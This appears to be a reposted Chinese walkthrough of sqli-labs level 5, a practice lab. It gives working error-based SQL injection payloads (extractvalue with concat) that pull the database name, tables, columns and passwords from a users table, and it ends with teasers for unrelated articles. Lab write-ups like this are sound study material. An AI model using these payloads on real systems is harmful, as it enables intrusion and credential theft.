sqli-labs---第五关

2024-05-26 13:52
文章标签 labs 第五 sqli

本文主要是介绍sqli-labs---第五关,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

1、判断注入类型

?id=1(没有正常显示)提示了一串字符

?id=1'(出现了错误提示)

根据页面的提示可以知道这是单引号'的闭合方式,并且是报错注入

2、查询数据库名

?id=1' and (extractvalue(1,concat(0x7e,(select database()),0x7e)))--+

3、查询表名(看到敏感表users)

?id=1' and (extractvalue(1,concat(0x7e,(select table_name) from information_schema.tables where table_schema='security'),0x7e))) --+

4、查询users表中字段的信息

 ?id=1' and (extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),0x7e))) --+

  ?id=1' and (extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 2,1),0x7e))) --+

5、查字段password中的值

可能是查询的语句不适合,使用下面的payload,可以查询,如果不加上limit 0,1,查询会超过一行,就会报错limit 表示从0+1个位置开始,显示第一个数据

 ?id=1' and (extractvalue(1,concat(0x7e,(select password from users limit 0,1),0x7e))) --+

  ?id=1' and (extractvalue(1,concat(0x7e,(select password from users limit 1,1),0x7e))) --+

可以根据修改第一个参数的值来显示密码,同理,用户名也一样 

这篇关于sqli-labs---第五关的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/1004652

相关文章

biostar handbook: 第五周笔记汇总+第六周任务布置

biostar handbook: 第五周笔记汇总+第六周任务布置

简单总结下第五周的笔记: biostarhandbook(五)|序列从何而来和质量控制YXF-测序仪和质量控制Biostar学习笔记(5)测序平台、测序原理及质量控制Biostar第六课 测序仪和QC 顺便发布第六周的任务: 第六周的任务是第十章和第十一章。其中第十一章介绍的是序列模式,是对正则表达式的温故知新。第十一章则是开始序列分析的重要一步:序列联配。任务如下: 什么是正则表达式什么
阅读更多...
biostar handbook: 第四周笔记汇总+第五周任务布置

biostar handbook: 第四周笔记汇总+第五周任务布置

不知不觉已经过去了四周,这个系列的开篇语写于2017年10月14日,距离今天差不多是一个月的时间了。这个月的时间学的内容并不算多,大致也就是如下几个内容: *nux基础: 这个尤为重要,学会了*nix(Linux或unix)之后,如果能够在日常科研生活中进行使用,那么你的效率将会大大提高。数据格式: 数据的保存具有一定的格式,处理数据的前提在于知己知彼,这样才能选择合适的工具。这个部分内容包括知
阅读更多...
[第五空间2019 决赛]PWN5

[第五空间2019 决赛]PWN5

参考文章: 格式化字符串漏洞原理及其利用(附带pwn例题讲解)_格式化字符串攻击教程-CSDN博客 格式化字符串漏洞原理详解_静态编译 格式化'字符串漏洞-CSDN博客 BUU pwn [第五空间2019 决赛]PWN5 //格式化字符串漏洞 - Nemuzuki - 博客园 (cnblogs.com) 栈溢出保护(cannary) 数据溢出保护(NX) 运行一下看看
阅读更多...
亚足联官方公布18强赛抽签时间及规则,国足确认位列第五档,你们觉得国足能进世界杯吗?

亚足联官方公布18强赛抽签时间及规则,国足确认位列第五档,你们觉得国足能进世界杯吗?

亚足联官方公布18强赛抽签时间及规则,国足确认位列第五档,你们觉得国足能进世界杯吗? 今天亚足联官方宣布了世预赛18强赛分组抽签仪式时间,本次抽签仪式将于6月27日15点在马来西亚吉隆坡举行。除了抽签时间之外,足联还官方确认了参加世预赛18强的这 18 支球队获得了 2027 年沙特亚洲杯的参赛资格。 按照规则:世预赛亚洲区18强赛将与2024年9月拉开战幕,2025年6月结束,18支球队
阅读更多...
Sqli-Labs之less-6

Sqli-Labs之less-6

说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 我们可以看到less-6的题目提示: 得知这道题是“双注入-双引号-字符型”。 所以,这道题的除了判断注入点时是【"–+】以外,其余的解题步骤和less-5是一模一样的! 完整过程详见: Sqli-Labs之less-5(双注入解法) 最后的结果是:
阅读更多...
Sqli-Labs之less-5(双注入解法)

Sqli-Labs之less-5(双注入解法)

说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 这一关花费了我大量的时间,我在网上看了很多别人的解题思路,发现基本上使用的都是盲注,网上用的比较多的就是布尔型盲注和时间延迟型盲注。 我没有花时间去学习什么是盲注,通过看网上的解题思路,我的理解就是,在没有可显字段的情况下,通过输入查询语句一个一个猜测、通过看页面回显来判断自己的猜测是否正确
阅读更多...
Sqli-Labs之less-4

Sqli-Labs之less-4

说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 目前看来,这几关都是基于less-1的思路,所以详细过程参见: Sqli-Labs之less-1 less-4的变化还是在于注入点的判断: 后续的操作还是一样:
阅读更多...
Sqli-Labs之less-3

Sqli-Labs之less-3

说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 目前看来,这几关都是基于less-1的思路,所以详细过程参见: Sqli-Labs之less-1 less-3的主要的变化还是在于注入点的判断: 后续的操作就一样了:
阅读更多...
单片机第五季-第八课:STM32CubeMx和FreeRTOS

单片机第五季-第八课:STM32CubeMx和FreeRTOS

1,FreeRTOS背景介绍 RTOS简介: 实时操作系统,本用于追求实时性的嵌入式系统,典型:ucos/uclinux/vxworks; 特点:中断响应快、一般可嵌套中断、使用实地址、多任务; (实地址:) 近年来趋势:由RTOS向IoTOS转型,典型:FreeRTOS/LiteOS/rt-thread; (IoTOS:主要与物联网相关,涉及到各种通讯协议等) FreeRTOS简介
阅读更多...
供应链初学者手册——第五部分:信息技术在供应链中的应用

供应链初学者手册——第五部分:信息技术在供应链中的应用

供应链初学者手册 文章目录 供应链初学者手册第五部分:信息技术在供应链中的应用10. 供应链信息系统10.1 SCM 系统的介绍10.2 ERP 系统在供应链中的应用 11. 物联网和区块链技术11.1 物联网在供应链中的应用11.2 区块链技术的潜在应用 总结 第五部分:信息技术在供应链中的应用 10. 供应链信息系统 在现代供应链管理中,信息技术的应用至关重要。供
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2